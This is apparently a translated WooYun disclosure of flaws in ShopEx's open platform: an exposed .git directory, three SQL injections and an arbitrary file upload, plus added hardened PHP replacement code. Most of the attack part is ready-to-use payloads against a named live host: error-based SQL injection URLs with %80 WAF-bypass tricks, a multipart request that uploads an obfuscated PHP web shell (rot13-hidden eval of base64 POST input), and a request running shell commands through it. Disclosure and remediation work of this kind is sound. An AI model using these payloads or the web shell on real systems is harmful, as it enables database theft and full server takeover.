
Shopex Open Platform SQL Injection and Getshell

ID: 160847
URL: http://www.wooyun.org/bug.php?action=view&id=160847
Status: vendor confirmed
Title: Shopex Open Platform SQL Injection and Getshell
Type: SQL injection
Vendor: ShopEx
White hat: loopx9
Submitted: 2015-12-14 19:10:00
Published: 2016-01-28 17:10:00
Fixed: (not set)
Confirmed: 2015-12-14 00:00:00
Confirm Spend: 0
Tags: information disclosure, source code audit
Followers: 0
Favorites: 0
White hat rating: self-assessed Rank 10
Vendor rating: Rank 15
Summary
SQL injection.
Details

BBScan found an exposed .git directory (git information leak):

http://open.shopex.cn/.git/


Downloaded the source with rip-git.pl.
Auditing the source turned up a SQL injection in
open.shopex.cn\core\application\controllers\docs.php:

/**
 * API method search list page
 *
 * @access public
 *
 * @return void
 */
public function api_search($category_id){
    $this->data['navigations'][] = array('name'=>'开发文档','url'=>'');
    $this->data['navigations'][] = array('name'=>'API文档','url'=>site_url('/docs/api_list/'.$category_id));
    // all three values come straight from the query string, unvalidated
    $platform_id = isset($_GET['platform_id'])?$_GET['platform_id']:0;
    $docs_keyword = isset($_GET['docs_keyword'])?trim(urldecode($_GET['docs_keyword'])):'';
    $method_type_id = isset($_GET['method_type_id'])?$_GET['method_type_id']:0;
    /**
     *
     * Switch the layout for the developer docs page
     */
    $this->layout->Layout('doc_details');
    /**
     *
     * Load the API list model and fetch the API list data
     */
    $this->load->model('method_type_model');
    $api_list_data_temp = $this->method_type_model->get_api_list_all();
    foreach($api_list_data_temp as $k=>$v){
        $api_list_data[$v['id']] = $v;
    }
    $this->data['api_list_data'] = $api_list_data;
    /**
     *
     * Supported platform list
     */
    $this->load->model('platform_model');
    $platform_list = $this->platform_model->get_platform_list();
    $this->data['platform_list'] = $platform_list;
    /**
     *
     * Condition filtering
     */
    $conditions = '1=1';
    if($platform_id>0){
        // platform_id concatenated into SQL without casting or escaping
        $conditions.= ' AND pm.platform_id='.$platform_id;
    }
    if($docs_keyword!=''){
        // docs_keyword concatenated into the LIKE patterns unescaped
        $conditions.= ' AND (m.name like "%'.$docs_keyword.'%" OR m.introduction like "%'.$docs_keyword.'%")';
    }
    /**
     *
     * Used by the left-hand filter
     */
    $this->load->model('method_model');
    $filter_method_list = $this->method_model->get_method_search_list($conditions);// method list
    $method_type_id_array = array();
    foreach($filter_method_list as $k=>$v){
        $method_type_id_array[] = $v['method_type_id'];
    }
    if($method_type_id>0){
        // method_type_id concatenated into SQL without casting or escaping
        $conditions.= ' AND mthm.method_type_id='.$method_type_id;
    }
    /**
     *
     * Load the API method model
     */
    $this->load->model('method_model');
    $method_list_temp = $this->method_model->get_method_search_list($conditions);// method list
    foreach($method_list_temp as $k=>$v){
        $temp = isset($api_list_data[$v['method_type_id']])?$api_list_data[$v['method_type_id']]['name']:'temp';
        $method_list_group[$temp][] = $v;
    }
    $this->data['method_list_group'] = $method_list_group;
    $this->data['method_type_id_array'] = $method_type_id_array;
    $this->data['docs_keyword'] = $docs_keyword;
    $this->data['platform_id'] = $platform_id;
    $this->data['category_id'] = $category_id;
    $this->data['method_type_id'] = $method_type_id;// current list ID
    $this->layout->view('docs/api_search',$this->data);
}
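A hardened replacement for the condition building in api_search(), added here as an example (it is not ShopEx's code). It validates the integer ids, drops the redundant urldecode(), and hands the keyword back as a bound parameter so the model can run a prepared statement; the same approach applies to the entid parameter of the passport login further down. The function name and the [sql, binds] return shape are assumptions.

```php
<?php
// Added example, not the ShopEx code. Builds the WHERE clause for the API
// search as SQL text with '?' placeholders plus the values to bind; a CI
// model would run $this->db->query("SELECT ... WHERE $sql", $binds).
function build_search_conditions(array $get, bool $withMethodType = true): array
{
    $where = ['1=1'];
    $binds = [];
    // Reject anything that is not a non-negative integer instead of
    // concatenating it: "1/extractvalue(...)" never reaches the query.
    $int = function (string $key) use ($get): int {
        $raw = $get[$key] ?? '';
        $v = $raw === '' ? 0 : filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
        if ($v === false) {
            throw new InvalidArgumentException("$key must be a non-negative integer");
        }
        return $v;
    };
    if (($platformId = $int('platform_id')) > 0) {
        $where[] = 'pm.platform_id = ?';
        $binds[] = $platformId;
    }
    // No urldecode(): $_GET is already decoded, and a second decode hands a
    // WAF an extra encoding layer to miss. LIKE wildcards are escaped so that
    // "50%" is searched literally (MySQL's default LIKE escape char is \).
    $keyword = trim((string) ($get['docs_keyword'] ?? ''));
    if ($keyword !== '') {
        $like = '%' . addcslashes($keyword, '%_\\') . '%';
        $where[] = '(m.name LIKE ? OR m.introduction LIKE ?)';
        $binds[] = $like;
        $binds[] = $like;
    }
    // api_search() builds the conditions twice: without method_type_id for
    // the left-hand filter list, then with it for the result list.
    if ($withMethodType && ($methodTypeId = $int('method_type_id')) > 0) {
        $where[] = 'mthm.method_type_id = ?';
        $binds[] = $methodTypeId;
    }
    return [implode(' AND ', $where), $binds];
}

// Constructed inputs: a wildcard in the keyword is bound as data, and the
// report's injected platform_id is rejected before any SQL text exists.
var_export(build_search_conditions(['docs_keyword' => '50%_off', 'method_type_id' => '3']));
try {
    build_search_conditions(['platform_id' => '1/extractvalue(1,concat(0x7e,user()))#']);
} catch (InvalidArgumentException $e) {
    echo PHP_EOL, 'rejected: ', $e->getMessage(), PHP_EOL;
}
```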


Three parameters are injectable:

platform_id, docs_keyword, method_type_id


A quick search shows this has already been reported:
WooYun: Shopex开放平台某处SQL注入
WooYun: Shopex官方某平台存在SQL注入漏洞一枚
WooYun: ShopEx某分站存在注入
The vulnerability still has not been fixed, but a WAF has been put in front of it.
The application runs on the CI framework, which by default filters UTF-8 characters out of request parameters, so inserting a %80 into the keyword is enough to bypass the WAF.

http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23


(screenshots: 1.png, 2.png)


Continuing through the code, there is an arbitrary file upload in
open.shopex.cn\core\application\controllers\uploads.php:

class Uploads extends CI_Controller {
    /**
     * Homepage image upload
     *
     * @access public
     */
    public function home_img(){
        if(empty($_FILES['image'])){
            $this->_return_msg('fail','上传内容格式不对!');
        }
        // only the client-supplied MIME type is checked, and only its prefix
        if(substr($_FILES['image']['type'],0,5)!='image'){
            $this->_return_msg('fail','请确认上传的是图片!');
        }
        $image_name = $_FILES['image']['name'];
        $image_name_exp = explode('.',$image_name);
        // extension is taken from the client-supplied filename, no whitelist
        $image_name = date('YmdHis').mt_rand(0,1).'.'.$image_name_exp[1];
        $uploadfile = FCPATH.'uploads/home_img/'.$image_name;
        move_uploaded_file($_FILES['image']['tmp_name'],$uploadfile);
        $data['img'] = base_url('/uploads/home_img/'.$image_name);
        $this->_return_msg('succ','成功',$data);
    }...
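A hardened upload handler, added as an example (not ShopEx's code). Both the trivial rename and the multipart-parsing trick below work because home_img() trusts the client-supplied type and takes the extension from whatever filename survives in the multipart part; this version reads neither, derives the extension from the bytes actually received, and stores the file under a random name. Function names, the 2 MB limit and the target directory are assumptions; the directory should additionally be served with PHP execution disabled.

```php
<?php
// Added example, not the ShopEx code. The extension is derived from the
// bytes on disk; the client-supplied name and Content-Type are never read.
function detect_image_extension(string $path): string
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    // A PHP script sent as "Content-Type: image/png" is still text/x-php
    // here, and getimagesize() rejects anything that is not a parsable image.
    if (!isset($allowed[$mime]) || getimagesize($path) === false) {
        throw new RuntimeException("rejected content type $mime");
    }
    return $allowed[$mime];
}
// Replacement for the body of home_img(): returns the stored path or throws.
function save_image_upload(array $file, string $dir, int $maxBytes = 2097152): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Only a file PHP itself received via multipart/form-data may be moved.
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > $maxBytes) {
        throw new RuntimeException('not an uploaded file, or too large');
    }
    $ext = detect_image_extension($file['tmp_name']);
    // Random name plus sniffed extension: nothing the client sent reaches the path.
    $target = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0644);
    return $target;
}

// Constructed inputs for a stand-alone run: a 1x1 PNG and a PHP script that
// would claim to be an image. Only the PNG yields an extension.
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='));
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'not an image';");
foreach ([$png, $php] as $candidate) {
    try {
        echo detect_image_extension($candidate), PHP_EOL;
    } catch (RuntimeException $e) {
        echo $e->getMessage(), PHP_EOL;
    }
    unlink($candidate);
}
```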


Using the PHP multipart/form-data parsing vulnerability to bypass the WAF and upload a PHP shell:

POST /index.php/uploads/home_img HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 341
Content-Type: multipart/form-data; boundary=----,xxoo
------,xxoo
Content-Disposition: form-data; name="image"; filename="1.jpg"
Content-Type: image/png
------
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: image/png
<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>
------
------,xxoo--


shell:

http://open.shopex.cn/uploads/home_img/201512122130440.php


POST /uploads/home_img/201512122130440.php HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=


(screenshot: 3.png)


There is one more SQL injection:

POST /index.php/passport/passport/login HTTP/1.1
Host: 122.144.135.142
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718
Content-Length: 131
biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true

PoC

(screenshots: 1.png, 2.png, 3.png)

Remediation

Delete the .git directory, or deny access to it.
Fix the SQL injections.
Restrict the upload feature to whitelisted extensions and add user permission checks.

Status: 2015-12-14: Details sent to the vendor, awaiting vendor response
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
Vendor reply: Thank you for your submission, we will handle it as soon as possible!!!
Response: severity High, vulnerability Rank 15, confirmed 2015-12-14 22:55
Comments (content / commenter / likes / time):

Waiting for it to go public.. boss / 带我玩 / 0 / 2015-12-17 10:36:00